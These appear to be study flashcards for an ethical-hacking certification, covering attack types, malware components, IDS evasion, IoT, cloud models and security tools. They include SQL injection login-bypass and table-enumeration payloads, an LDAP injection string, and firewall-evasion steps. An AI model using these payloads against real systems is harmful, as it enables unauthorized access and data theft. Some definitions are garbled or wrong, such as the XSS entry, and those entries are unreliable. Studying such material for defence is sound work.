Attackers use this type of attack when they obtain some information about the password (active online attack) For online password cracking attacks, an attacker will sometimes use a combination of both brute force and a dictionary. This combination falls into the category of Hybrid and Syllable password cracking attacks. o Hybrid Attack This type of attack depends on the dictionary attack. Often, people change their passwords merely by adding some numbers to their old passwords. In this case, the program would add some numbers and symbols to the words from the dictionary to try and crack the password o Syllable Attack Hackers use this cracking technique when passwords are not known words.
Attack Database Connectivity
Attacking data connectivity can result in unauthorized control over the database. Attacks on data connectivity provide attackers with access to sensitive database information. Database connectivity attacks exploit the way applications connected to the database instead of abusing database queries Example of a common connection string used to connect to a Microsoft SQL Server database: *"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"*
Protocol Attack
Attacks exhaust resources available on the target or on a specific device between the target and the Internet. These attacks consume the connection state tables present in the network infrastructure devices such as load-balancers, firewalls, and application servers, and no new connections will be allowed since the device will be waiting for existing connections to close or expire. The magnitude of attack is measured in packets per second (pps) or connections per second (cps). These attacks can even take over state of millions of connections maintained by high capacity devices
Bypass Website Logins Using SQL
Bypassing website logins is a fundamental and common malicious activity that an attacker can perform by using SQL injection. This is the easiest way to exploit any SQL injection vulnerability of the application. website login forms: o admin' -- o admin' # o admin'/* o ' or 1=1-- o ' or 1=1# o ' or 1=1/* o ') or '1'='1-- o ') or ('1'='1--
Executing Applications
Called "owning" the system The malicious programs attackers execute on target systems can be o Backdoors-Program designed to deny or disrupt operation, gather information that leads to exploitation or loss of privacy, gain unauthorized access to system resources. o Crackers-Piece of software or program designed for cracking a code or passwords. o Keyloggers-This can be hardware or a software type. In either case, the objective is to record each keystroke made on the computer keyboard. o Spyware-Spy software may capture the screenshots and send them to a specified location defined by the hacker. To this purpose, attackers have to maintain access to victims' computers. After deriving all the requisite information from the victim's
Web Application Attacks
Can be performed if the web developers do not adopt secure coding practices while developing web applications. Types Parameter/Form Tampering -In this type of tampering attack, the attacker manipulates the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, and so on. Cookie Tampering -occur when sending a cookie from the client side to the server. Different types of tools help in modifying persistent and non-persistent cookies Unvalidated Input and File Injection Attacks - attacks are performed by supplying an unvalidated input or by injecting files into a web application SQL Injection Attacks -exploits the security vulnerability of a database for attacks. The attacker injects malicious code into the strings, later passed on to the SQL Server for execution Session Hijacking -an attack in which the attacker exploits, steals, predicts, and negotiates the real valid web session's control mechanism to access the authenticated parts of a web application. Directory Traversal -the exploitation of HTTP through which attackers can access restricted directories and execute commands outside of the web server's root directory by manipulating a URL. DoS -intended to terminate the operations of a website or a server and make it unavailable for access by intended users. XSS -intended to terminate the operations of a website or a server and make it unavailable for access by intended users. Buffer Overflow -attacker uses this advantage and floods the application with too much data, which in turn causes a buffer overflow attack. CSRF -attacker exploits the trust of an authenticated user to pass malicious code or commands to the web server. Command Injection - a hacker alters the content of the web page by using html code and by identifying the form fields that lack valid constraints. Source Code Disclosure- a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. This disclosure can sometimes allow the attackers to gain sensitive information about database credentials and secret keys and compromise the web servers
Fragmentation Attack
Can obtains 1500 bytes of pseudo random generation algorithm (PRGA), then generate packets with packetforge-ng The Aircrack-ng suite program helps attacker to obtain a small amount of keying material from the packet, then attempts to send ARP and/or LLC packets with known content to the AP.
Which components are included in a scanning methodology?
Checking for: 1. Live Systems 2. Open Ports 3. Scan beyond IDS 4. Banner grabbing 5. Vulnerability scans 6. Drawing network diagrams 7. Prepare Proxies
Components of Malware
Crypter - software that protects malware from undergoing reverse engineering or analysis, thus making the task of the security mechanism harder in its detection Downloader - a type of Trojan that downloads other malware from the internet on to the PC. Usually, attackers install downloader software when they first gain access to a system Dropper - a type of Trojan that installs other malware files on to the system that it brought when installed Exploit - a malicious code that breaches the system security via software vulnerabilities to access information or install malware Injector - a program that injects its code into other vulnerable running processes and changes the way of execution in order to hide or prevent its removal Obfuscator - a program that conceals its code and intended purpose via various techniques, and thus, makes it hard for security mechanisms to detect or remove it Packer - a program that allows all files to bundle together into a single executable file compression in order to bypass security software detection Payload - a piece of software that allows control over a computer system after it has been exploited Malicious Code - a command that defines malware's basic functionalities such as stealing data and creating backdoors.
KeyCzar
Cryptography Toolkit An open source cryptographic toolkit designed to make it easier and safer for developers to use cryptography in their applications. It supports authentication and encryption with both symmetric and asymmetric keys. Features: o Key rotation and versioning o Safe default algorithms, modes, and key lengths o Automated generation of initialization vectors and ciphertext signatures o Java, Python, and C++ implementations o International support in Java
Why people think Web Servers are Compromised
Different people believe it is for different reasons Webmaster- The biggest security concern is that the web server can expose the local area network (LAN) or the corporate intranet to threats the Internet poses. Network Admin- A poorly configured web server poses another potential hole in the local network's security. End user -does not perceive any immediate threat, as surfing the web appears both safe and anonymous
inSSIDer Office
Discovery Tool AWi-Fi optimization and troubleshooting tool. It scans for wireless networks with your Wi-Fi adapter The application uses a native Wi-Fi API and the user's NIC, and sorts the results by MAC address, SSID, channel, RSSI, MAC, vendor, data rate, signal strength and "Time Last Screen. Features: o Inspect WLAN and surrounding networks to troubleshoot competing APs o Track the strength of the received signal in dBm over time o Track the strength of received signal in dBm over time and filter access points o Highlight APs for areas with high Wi-Fi concentration o Export Wi-Fi and GPS data to a KML file to view in Google Earth o Shows which Wi-Fi network channels overlap o Compatible with GPS devices
Types of Control
Discretionary Access Control (DAC) - It permits the user, who is granted access to information, to decide how to protect the information and the level of sharing desired. Role Based Access Control (RBAC) -the access permissions are available based on the access policies determined by the system Mandatory Access Control (MAC) - determine the usage and access policies of the users.
Static Malware Analysis - Malware Disassembly
Dismantling the binary code and analyze the assembly code instruction Use tools such as IDA that can reverse machine code to assembly language Based on the reconstructed assembly code, you can inspect the program logic and recognize its threat potential. Tool - OllyDbg
Sniffing Network News Transfer Protocol (NNTP)(119)
Distributes, inquires, retrieves, and posts news articles using a reliable stream-based transmission of news among the ARPA-Internet community. The protocol fails to encrypt the data which gives an attacker the opportunity to sniff sensitive information.
Permanent Denial-of-Service (PDoS)
DoS attack also known as phlashing, purely targets hardware causing irreversible damage to the hardware, perform this attack using a method known as "bricking a system." This PDoS attack exploits security flaws in a device, thereby allowing the remote administration on the management interfaces of the victim's hardware, such as printers, routers, or other networking devices This attack is quicker and is more destructive than the traditional DoS attacks and works with a limited number of resources
Detecting presence of Fake AP
Fake access points only send beacon frames but do not produce any fake traffic on the access points, and an attacker can monitor the network traffic and quickly notice the presence of Fake AP.
Tailgating
Implies access to a building or secured area without the consent of the authorized person. It is the act of following an authorized person through a secure entrance, as a polite user would open and hold the door for those following him.
Android Security Tool: Find My Device
Find My Device helps you easily locate a lost Android device, and keeps your info safe and sound while you look. o Go to https://www.google.com/android/find and sign in to your Google Account -If you have more than one device, click the lost device at the top of the screen -The device gets a notification - On the map, see about where the device is -Pick what you want to do. -If needed, first click Enable lock & erase -Play sound: rings your device at full volume for 5 min o Lock: locks your device with your PIN, pattern, or password o Erase: permanently deletes all data on your device
OWASP A5: Broken Access Control
Restrictions on what authenticated users are allowed to do are not properly enforced -Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc Privilege escalation
Service Hijacking using Social Engineering Attacks
In account or service hijacking, an attacker steals a CSP's or client's credentials by methods such as phishing, pharming, social engineering, and exploitation of software vulnerabilities. A nontechnical kind of intrusion that relies heavily on human interaction and often involves tricking others to break routine security procedures
WiGLE
GPS Mapping tool consolidates location and information of wireless networks worldwide to a central database, and provides user-friendly Java, Windows, and web applications that can map, query and update the database via the web. You can add a wireless network from a stumble file or by hand and add remarks to an existing network
Vuln Assessment Tools: Mobile
Retina CS for Mobile, SecurityMetrics Mobile, Nessus, IP Tools, Network Scanner
info:
This operator finds information for the specified web page. [info:gothotel.com] provides information about the national hotel directory GotHotel.com home page
MD5 Tool : Onlinemd5
Generates and checks file integrity by secure time-proven algorithms like MD5, SHA-1 and SHA-256. One can create checksums (the digital fingerprints) of files and verify their integrity in the future using this online tool.
Random Scanning
In this technique the infected machine (an attacker's machine or a zombie) probes IP addresses randomly from the target network's IP range and checks their vulnerability. This technique generates a significant traffic as many compromised machines probe and check the same IP addresses. Malware propagation takes place quickly in the initial stage, and later on, it reduces as the number of new IP addresses available will be less as the time passes.
allinanchor:
This operator restricts results to only those pages containing all query terms specified in the anchor text on links to the page. [allinanchor: best cloud service provider] query returns only pages in which the anchor text on links to the pages contain the words "best," "cloud," "service," and "provider."
allinurl:
This operator restricts results to only those pages containing all the query terms specified in the URL. [allinurl: google career] query returns only pages containing the words "google" and "career" in the URL.
Types of Vuln Assessment Tools
Host-Based- scanning tools are apt for servers that run various applications such as the web, critical files, databases, directories, and remote accesses. Depth -used to find and identify previously unknown vulnerabilities in a system. Application-Layer - designed to serve the needs of all kinds of operating system types and applications. Scope -provides assessment of the security by testing vulnerabilities in the applications and operating system. -Some assessment tools are designed to test a specific application or its type for vulnerability. Active/Passive -Active scanners perform vulnerability checks on the network that consume resources on the network. Location/Data -o Network-Based Scanner: Network-based scanners are those that interact only with the real machine where they reside and give the report to the same machine after scanning. -o Agent-Based Scanner: Agent-based scanners reside on a single machine but have the ability to scan a number of machines on the same network. -o Proxy Scanner: Proxy scanners are the network-based scanners that have the ability to scan networks from any machine in the network. -o Cluster scanner: Cluster scanners are similar to proxy scanners but have the ability to perform two or more scans on different machines simultaneously in the network.
Scanning Tools for Mobile
IP Scanner - for iOS scans your local area network to determine the identity of all its active machines and Internet devices Fing - a mobile app for Android and iOS that scans and provides complete network information, such as IP address, MAC address, device vendor, and ISP location. Hackode zANT cSplit FaceNiff PortDroid Netwrok Analysis Pamn Ip Scanner
Three parties required to communicate
IP address Port numbers Sequence number
Screen Capture Spyware
a program that allows you to monitor computer activities by taking snapshots or screenshots of the computer on which the program is installed.
Detecting presence of Snort_inline
If an outgoing packet is dropped, that might look like a black hole to an attacker, and when the snort_inline modifies an outgoing packet, the attacker can capture the modified packet through another host system and identify the packet modification
Obfuscator
a program that conceals its code and intended purpose via various techniques, and thus, makes it hard for security mechanisms to detect or remove it
13 (TIMESTAMP) 17 (ADDRESS MARK REQUEST)
ICMP Query uses which two types of ICMP messages?
Vulnerability Assessment
ID weaknesses &/or test security measures pg 143
Denial of Service (DoS) Atk
IDS evasion technique The resources affected by the attacker are CPU cycles, memory, disk space, and network bandwidth. Attackers monitor and attack the CPU capabilities of the IDS. This is because IDS needs half of the CPU cycle to read the packets
IDS Evasion
IDS evasion technique This attack occurs when the IDS discards packets while the host that has to get the packets accepts them. This attack at the IP layer allows an attacker to attempt arbitrary attacks against hosts on a network, without the IDS ever realizing it. For example, if the attacker sends malicious sequence byte by byte, and if the IDS rejects only one byte, it cannot detect the attack.
Insertion Attack
IDS evasion technique This is the process in which the attacker confuses the IDS by forcing it to read invalid packets This attack occurs when NIDS is less strict in processing packets than the internal network Attacker obscures extra traffic and IDS concludes traffic is harmless. Hence, the IDS gets more packets than the destination Every packet transmitted on an IP network has a checksum that verifies the corrupted packets. IP checksums are 16-bit numbers, computed by examining information in the packet. I
Fragmentation Attack
IP packets must follow standard Maximum Transmission Unit (MTU) size while traveling across the network. If the packet size is exceeded, it will be splitted into multiple fragments ("fragmentation"). The IP header contains a fragment ID, fragment offset, fragment length, fragments flags, and others besides the original data. In a network, the flow of packets is irregular, so systems need to keep fragments around, wait for future fragments, and then reassemble them in order. Fragmentation can be used as an attack vector when fragmentation timeouts vary between IDS and host.
-sO (IP protocol scan)
IP protocol scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines. This isn't technically a port scan, since it cycles through IP protocol numbers rather than TCP or UDP port numbers.
Finding IP Geolocation Information
IPLocation - geo IP solution to help the user identify visitor's geographical location, i.e. country, region, city, latitude and longitude of city, ZIP code, time zone, connection speed, ISP, domain name, IP Location Finder GeoIP Lookup Tool GeoIP2
Components of IPsec
IPsec driver: A software, that performs protocol-level functions required to encrypt and decrypt the packets Internet Key Exchange (IKE): IPsec protocol that produces security keys for IPsec and other protocols. Internet Security Association Key Management Protocol (ISKAMP); Software that allows two computers to communicate by encrypting the data exchanged between them. Oakley: A protocol, which uses the Diffie-Hellman algorithm to create master key, and a key that is specific to each session in IPsec data transfer. IPsec Policy Agent: A service of the Windows 2000 collects IPsec policy settings from the active directory and sets the system configuration system at startup.
Pen Test: Pwd Cracking
Identify Password Protected systems -Check for password complexity -Perform social engineering -Perform shoulder surfing -Perform DUmpster diving -Perform dictionary Attack -Perfrom Brute-Force attack -Rule Based Attack -Password Guessing -Trojan/Spyware/Keyloggers -Hash injection Attck -Wire Sniffing -Man-in-the-Middle Attack -Reply Attack -Rainbow Table ATtack -Distibutes Network Attack
SAINT
Identify SW vuln & patch deficiencies, web app vuln, risk exposures, state of AV installs, config assessments etc
SAINT
Identify Software vulnerability & patch deficiencies, web app vulnerability, risk exposures, state of AV installs, config assessments etc As a vulnerability assessment solution, security research and development efforts focus on investigation, triage, prioritization and coverage of vulnerabilities of the highest severity. It performs risk analysis, and remediation and continuous monitoring. vulnerability management capabilities identify operating system and software vulnerabilities and patch deficiencies, Microsoft Patch Tuesday assessments, web applications vulnerabilities and risk exposures, state of anti-virus installations, configuration assessments based on industry-standard best-practices, exposure of sensitive content
DB, Table & Column Enumeration
Identify User Level Privilege DB Administrators -include sa, system, sys, dba, admin, root, and many others. The dbo is a user that has implied permissions to perform all activities in the database. Discover DB Structure -Determine table and column names ' group by columnnames having 1=1 -- -Discover column name types ' union select sum(columnname ) from tablename -- -Enumerate user defined tables ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- Column Enumeration in DB o MySQL show columns from tablename o Oracle SELECT * FROM all_tab_columns WHERE table_name='tablename ' o DB2 SELECT * FROM syscat.columns WHERE tabname= 'tablename ' o Postgres SELECT attnum,attname from pg_class, pg_attribute WHERE relname= 'tablename ' AND pg_class.oid=attrelid AND attnum > 0
Firewall Pen Testing
Identifying the Firewall o Perform port scanning technique to know the available ports that uniquely identify the firewalls o Perform banner grabbing technique to detect the services run by the firewall o Perform firewalking technique to determine access information on the firewall when probe packets are sen Performing various Attacks o Perform IP address spoofing to gain unauthorized access to a computer or a network o Perform source routing to designate the packet route to bypass the firewall o Perform fragmentation attack to force the TCP header information into the next fragment to bypass the firewall o Type the IP address directly in browser's address bar in place of typing the blocked website's domain name to evade the firewall restriction o Use proxy servers that block the actual IP address and display another thereby allowing access to the blocked website o Perform ICMP tunneling to tunnel a backdoor application in the data portion of ICMP Echo packets o Perform ACK tunneling using tools such as AckCmd to tunnel backdoor application with TCP packets with the ACK bit set o Perform HTTP tunneling using tools such as Super Network Tunnel, HTTPort, HTTHost, Tunna, etc. to tunnel the traffic across TCP port 80 o Perform SSH tunneling using tools such as Bitvise to encrypt and tunnel all the traffic from a local machine to a remote machine o Gain access to the corporate network by sniffing the user's traffic and stealing the session ID and cookies o Perform MITM attack to own corporate DNS server or to spoof DNS replies to it o Perform XSS attack to identify the vulnerabilities present in the Web Application Firewall
Example of LDAP
If an attacker enters valid user name "certifiedhacker" and injects *certifiedhacker)(&))* then the URL string becomes *(&(USER=certifiedhacker)(&))(PASS=blah))* only the first filter is processed by the LDAP server, only the query *(&(USER=certifiedhacker)(&))* is processed. This query is always true, and the attacker logs into the system without a valid password
Attack Application Logic Flaws
In all web applications, vast amount of logic is applied at every level. Implementation of some logics can be vulnerable to various attacks and will not be noticeable. Most of the application flaws arise due to the negligence and false assumptions of the developers. Application logic flaw differs with different type of web applications and is not restricted to a particular flaw. -Scenario: Identify and exploit Logic Flaws in retail web applications
Default Installations
In some cases, infected devices may not contain any valuable information but they are connected to networks or systems that have confidential information that would result in a data breach. Not changing the default settings while deploying the software or hardware allows the attacker to guess the settings in order to break into the systems
MITM/Sniffing Atk
In these attacks, an intruder intercepts or modifies the messages exchanged between the user and web server through eavesdropping or intruding into a connection The attacker lures the victim to connect to the web server by pretending to be a proxy. If the victim believes and agrees to the attacker's request, then all the communication between the user and the web server passes through the attacker. In this way, the attacker can steal sensitive user information.
Role Based Access Control (RBAC):
In this access control, the access permissions are available based on the access policies determined by the system. The access permissions are out of user control, which means that users cannot amend the access policies created by the system. Users can be assigned access to systems, files, and fields on a one-to-one basis whereby access is granted to the user for a particular file or system. It can simplify the assignment of privileges and ensure that individuals have all the privileges necessary to perform their duties.
Attack Authorization Schemes
In this attack, the attacker first finds a legitimate account with limited privileges, then logs in as that user, and gradually escalates privileges to access protected resources. Attackers use sources such as uniform resource identifiers, parameter tampering, POST data, HTTP headers, query strings, cookies, and hidden tags to perform authorization attack
MAC Spoofing/Duplicating
In this attack, the attacker first retrieves the MAC addresses of clients who are actively associated with the switch port. Then the attacker spoofs his MAC address with the MAC address of the legitimate client. If the spoofing is successful, then the attacker can receive all the traffic destined for the legitimate client
Known-plaintext Attack
In this attack, the only information available to the attacker is some plaintext blocks along with corresponding ciphertext and algorithm used to encrypt and decrypt the text. This attack works on block ciphers and is an example of linear cryptanalysis.
IoT models : Device-to-Gateway
In this communication model, Internet of Things device communicates with an intermediate device called a Gateway, which in turn communicates with the cloud service. This device could be a Smartphone or a Hub that is acting as an intermediate point, also provides security features and data or protocol translation. The protocols generally used in this mode of communication are ZigBee and Z-Wave.
Packet Filtering Firewall
In this firewall, each packet is compared to a set of criteria before it is forwarded. Depending on the packet and the criteria, the firewall can drop the packet and transmit it, or send a message to the originator. It works at the Internet Protocol (IP) layer of the TCP/IP model or network layer of the OSI model. Packet filter-based firewalls concentrate on individual packets, analyze their header information, and determine which way they need to direct. This makes decisions according to -Source IP address: -Destination IP address: -Source TCP/UDP port -Destination TCP/UDP port -TCP flag bits: Used to check whether the packet has an SYN, ACK, or other bits set for the connection to be made. -Protocol in use -Direction: -Interface: Used to check whether or not the packet is coming from an unreliable zone
Bypass Firewall via Content
In this method the attacker sends the content containing malicious code to the user and tricks user to open it so that the malicious code can be executed Commonly used file formats for carrying malicious contents are: EXE,COM,BAT,PS, PDF CDR (Corel Draw) DVB,DWG (AutoCad) SMM (AMI Pro) DOC,DOT,CNV,ASD (MS Word) XLS,XLB,XLT (MS Excel) ADP, MDA,MDB,MDE,MDN,MDZ (MS Access) VSD (Visio) MPP,MPT (MS Project) PPT,PPS,POT (MS PowerPoint) MSG,OTM (MS Outlook)
False Positive Generation
In this mode, the IDS generates an alarm when no condition is present to warrant one.
Public Cloud
In this model, the provider makes services such as applications, servers, and data storage available to the public over the Internet. o Advantages: -• Simplicity and efficiency -• Low cost -• Reduced time (when server crashes, needs to restart or reconfigure cloud) -• No maintenance (public cloud service is hosted off-site) -• No contracts (no long-term commitments) o Disadvantages: -• Security is not guaranteed -• Lack of control (third-party providers are in charge) -• Slow speed (relies on Internet connections, data transfer rate is limited)
Web Server Passwords Hacking Tools
In this phase of web server hacking, an attacker tries to crack web server passwords Hashcat -A Multi-OS, Multi-Platform compatible cracker that can perform Multi-Hash (MD4, 5; SHA - 224, 256, 384, 512; RIPEMD-160 etc.), -Multi-Devices password cracking. -The attack modes of this tool are straight, combination, brute force, Hybrid dict + mask, and Hybrid mask + dict. Ncrack Rainbow crack THC Hydra Wfuzz Medusa Wireshark
Pre-Assessment Phase: Creating a Baseline
In this phase, critical assets are identified and prioritized to create a good baseline for the vulnerability management. 1. ID & understand business processes 2. ID supporting apps, data & services 3. Asset inventory & prioritization 4. Map network 5. ID controls already in place 6. Understand policy implementation & standards compliance 7. Define scope of assessment 8. Create info protection procedures pg 144
Shared Key Authentication Process
In this process, each wireless station receives a shared secret key over a secure channel that is distinct from the 802.11 wireless network communication channels.
allintitle:
This operator restricts results to only those pages containing all the query terms specified in the title. [allintitle: detect malware] query returns only pages containing the words "detect" and "malware" in the title.
Permutation Scanning
In this technique, attackers share a common pseudorandom permutation list of IP addresses among all machines that is created by using a block cipher of 32 bits and a preselected key if scanning directs an already infected system by either hit-list scanning or another method, it starts scanning from the next IP in the list. if scanning detect an already infected system by permutation list, it starts scanning from a random point in permutation list. The process of scanning stops when the compromised host encounters a predefined number of already infected machines sequentially failing to find the new targets. Now generate a new permutation key to initiate a new scanning phase. Advantages: -o Reinfection of the same target is avoided. -o New targets are scanned at random (thus ensuring high scanning speed).
Chosen-key Attack
In this type of attack, an attacker not only breaks a ciphertext but also breaks into a bigger system, which is dependent on that ciphertext. Attacker usually breaks an n bit key cipher into 2 n/2 number of operations.
IoT models : Device-to-Cloud
In this type of communication, devices communicate with the cloud directly rather than directly communicating with the client in order to send or receive the data or commands. It uses communication protocols such as Wi-Fi or Ethernet and sometimes uses Cellular as well.
IoT models: Device-to-Device
In this type of communication, devices that are connected interact with each other through the internet but mostly they use protocols like ZigBee, Z-Wave or Bluetooth. Most commonly used in the smart home devices like a thermostat, Light Bulb, Door-locks, CCTV cameras, Fridge, etc. where these devices transfer small data packets to each other at a low data rate. This model is also popular in communication between wearable devices. For example, an ECG/EKG device attached to the body of a patient will be paired to his/her smartphone and will send him/her notifications in an emergency.
By looking at the latency of the response from the service
In what way do the attackers identify the presence of layer 7 tar pits? -By looking at the IEEE standards for the current range of MAC addresses -By looking at the responses with unique MAC address 0:0:f:ff:ff:ff -By analyzing the TCP window size -By looking at the latency of the response from the service
IoT Hacking Methodology
Information gathering -Tool-Shoden, Multiping Vulnerability scanning o Tool - Vulnerability scanning - Nmap, RioT - Sniffing - Foren6 Launch attacks o Tools -Rolling Code (uses RFCrack) -Hacking Zigbee (uses Attify) -BlueBorne (uses HackRF One) Gain Access o Tools -Remote access - Telnet Maintain access -Exploit Firmware
AES Pseudocod
Initially, the system copies the cipher input into the internal state and then adds an initial round key. The system transforms the state by iterating a round function in a number of cycles. Depending on the block size and key length, the number of cycles may vary. After completing rounding, the system copies the final state into the cipher out
Perform Injection Attacks
Injection attacks are very common in web applications; they exploit the vulnerable input validation mechanism implemented by the web application. Types o Web Scripts Injection: If user input is used into dynamically executed code, enter crafted input that breaks the intended data context and executes commands on the server. o OS Commands Injection: Exploit operating systems by entering malicious codes in input fields if applications utilize user input in a system-level command. o SMTP Injection: Inject arbitrary STMP commands into application and SMTP server conversation to generate large volumes of spam email. o SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database. o LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases. o XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic. o Buffer Overflow: Injects large amount of bogus data beyond the capacity of the input field. o Canonicalization: Manipulate variables that reference files with "dot-dot-slash (../)" to access restricted directories in the application
OWASP A1: Injection
Injection flaws, such as SQL, command injection, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. SQL Injection- uses an ALL CAPS cmd syntax -most common Command Injection- shell, html, file injection -highly dangerous LDAP Injection- cn=GSnowden40 ou=IT dc=CEH dc=com
Even More Vulnerability solution
Insecure Mobile Interface o Use strong and complex password o Enable account lockout mechanism o Enable two-factor authentication Insufficient Security Configurability o Enable security logging mechanism o Allow the selection of encryption options o Notify end users regarding security alerts Insecure Software / Firmware o Secure update servers o Verify updates before installation o Sign updates Insecure Cloud Interface o Conduct assessment of all the cloud interfaces o Use strong and complex password o Enable two-factor authentication
Vulnerability solution
Insecure Web Interface o Enable default credentials to be changed o Enable account lockout mechanism o Conduct periodic assessment of web applications Insufficient Authentication / Authorizatio o Implement secure password recovery mechanisms o Use strong and complex passwords o Enable two-factor authentication Insecure Network Services o Close open network ports o Disable UPnP o Review network services for vulnerabilities
Cryptanalysis Attacks
Insecure or obsolete encryption makes cloud services susceptible to cryptanalysis. Data present in the cloud may be encrypted for the prevention from being read if accessed by malicious users. However, critical flaws in cryptographic algorithm implementations (e.g.: weak random number generation) might turn strong encryption to weak or broken, also there exist novel methods to break the cryptography.
Vulnerability Assessment: Product-Based
Installed in private (non-routable) space. May not detect outside attacks if sitting behind FW.
Vulnerability Assessment: Product-Based
Installed in private (non-routable) space. May not detect outside attacks if sitting behind FW. pg 146
Payment Card Industry Data Security Standard (PCI DSS)
a proprietary information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, ATM, and POS cards
Security Issues from App Stores
Insufficient or no vetting of apps leading to malicious and fake apps entering app marketplace App stores are common target for attackers to distribute malware and malicious apps Attackers can also social engineering users to download and run apps outside the official app stores Malicious apps can damage other applications and data, and send your sensitive data to attackers
Technical Steganography
Invisible ink, or "security ink," - is one of the methods of technical steganography. It is used for invisible writing with colorless liquids and can later be made visible by certain pre-negotiated manipulations such as lighting or heating. A microdot - is text or an image considerably condensed in size (with the help of a reverse microscope), up to one page in a single dot, to avoid detection by unintended recipients. Microdots are usually circular, about one millimeter in diameter, but are changeable into different shapes and sizes. A computer-based method makes changes to digital carriers to embed information foreign to the native carriers.
Web Cache Poisoning Attack
This attacks the reliability of an intermediate web cache source. In this attack, the attackers swap cached content for a random URL with infected content. An attacker forces the web server's cache to flush its actual cache content and sends a specially crafted request to store in cache. These attacks are possible if the web server and application has HTTP Response-Splitting flaws.
Wrappers
This blinds a Trojan executable with genuine-looking EXE applications such as games or office applications. When run it installs the Trojan in the background and then runs this application in the foreground. Technically speaking, they are a type of "glueware" used to bind other software components together Programs used for this -IExpress Wizard -Elite Wrap -Advanced File Joiner -Soprano 3 - Exe2vbs - Kriptomatik
Web Crawling via Mozenda
It crawls through a website and harvests pages of information. The software support logins, result index, AJAX, borders, and others. other Tools o Octoparse o crawler4j o Giant Web Crawl
The Digital Millennium Copyright Act (DMCA)
It defines legal prohibitions against circumvention of technological protection measures employed by copyright owners to protect their works, and against the removal or alteration of copyright management information in order to implement US treaty obligations.
Bandwidth
It describes the amount of information that may be broadcasted over a connection. -Usually, refers to the data transfer rate. -Measured in bits (amount of data) per second (bps).
Server certificates
It guarantee security by providing certificates signed from a trusted authority. However, an attacker may compromise certified servers using forged certificates in order to intercept the secure communication by performing MITM attacks
IoT OS : RIOT OS
It has less resource requirement and uses energy efficiently. It has an ability of running on embedded systems, actuator boards, sensors, etc
Urgent alias "URG":
It instructs the system to process the data contained in packets as soon as possible. processes it first, stopping all the other data processes
SHA-1
It is a 160-bit hash function that resembles the former MD5, produces a 160-bit digest from a message with a maximum length of (264 − 1) bits. -It is most commonly used in security protocols such as PGP, TLS, SSH, and SSL. -Helps against brute force -As of 2010, SHA-1 is no longer approved for cryptographic use because of cryptographic weaknesses.
Hybrid Cloud
It is a cloud environment comprised of two or more clouds (private, public, or community) that remain unique entities but bound together for offering the benefits of multiple deployment models. o Advantages: -• More scalable (contains both public and private clouds) -• Offers both secure resources and scalable public resources -• High level of security (comprises private cloud) -• Allows to reduce and manage the cost as per the requirement o Disadvantages: -• Communication at the network level may be conflicted as it uses both public and private clouds -• Difficult to achieve data compliance -• Organization has to rely on the internal IT infrastructure for support to handle any outages (maintain redundancy across data centers to overcome) -• Complex Service Level Agreements (SLAs)
Community Cloud
It is a multi-tenant infrastructure shared among organizations from a specific with common computing concerns such as security, compliance, performance requirements, and jurisdiction. can be either on-premises or off-premises and governed by the participated organizations or by a third-party managed service provider o Advantages: -• Less expensive compared to the private cloud -• Flexibility to meet the community's needs -• Compliance with legal regulations -• High scalability -• Organizations can share a pool of resources and from anywhere via Internet o Disadvantages: -• Competition between consumers in usage of resources -• No accurate prediction of required resources -• Who is the legal entity in case of liability? -• Moderate security (other tenants may be able to access data) -• Trust and security concerns between the tenants
De-Militarized Zone (DMZ)
It is an area that hosts computer(s) or a small sub-network placed as a neutral zone between a particular company's internal network and untrusted external network to prevent outsider access to a company's private data It serves as a buffer between the secure internal network and the insecure Internet, as it adds a layer of security to the corporate LAN, thus preventing direct access to other parts of the network. It is created using a firewall with three or more network interfaces assigned specific roles, Any service such as mail, web, and FTP that provide access to external users can be placed in the this; Although web servers that communicate with database servers cannot reside here—as doing so could give outside users direct access to sensitive information.
Web Spidering Using Burp Suite
It is an integrated platform for attacking web applications. It contains all the Burp tools with numerous interfaces between them, designed to facilitate and speed up the process of attacking an application. It allows you to combine manual and automated techniques to enumerate, analyze, scan, attack, and exploit web applications. Configure -> Proxy intercept -> intercept off -> visiting every single link/URL -> Target -> Spider this host /branch -> confirm -> Yes
Short-range communication : Zig-Bee
It is another short-range communication protocol based on IEEE 203.15.4 standard. This is for the devices that transfer data infrequently at low data-rate in a restricted area and within a range of 10-100 meters.
medium-range communication : Ha-low
It is another variant of Wi-Fi standard that provides extended range, making it useful for communications in rural areas. It offers low data rates, thus reducing power and cost for transmission
Timing Attack
It is based on repeatedly measuring the exact execution times of modular exponentiation operations. Attacker tries to break the ciphertext by analyzing the time taken to execute the encryption and decryption algorithm for various inputs.
Evasion Technique: URL Encoding
It is performed by replacing the characters with their ASCII code in hexadecimal form preceding each code point with a percent sign "%".
LPWAN : Neul
It is used in a tiny part of the TV white space spectrum to deliver high quality, high power, high coverage and low-cost network
IoT OS : Contiki
It is used in low-power wireless devices such as street lighting, sound monitoring systems, etc
DarkHorse Trojan Virus Maker
It is used to create user-specified Trojans by selecting from various options available. The option Disable Process - Trojan disables all processes on the target system.
What is Authentication Header (AH)?
It is useful in providing connectionless integrity and data origin authentication for IP datagrams and anti-replay protection for the data payload and some portions of IP header of each packet. It does not support data confidentiality (no encryption). A receiver can select the service to protect against replays, an optional service on establishing a Security Association (SA).
Synchronize alias "SYN":
It notifies the transmission of a new sequence number. This flag generally represents the establishment of a connection (3-way handshake) between two hosts
Web 2.0 Applications
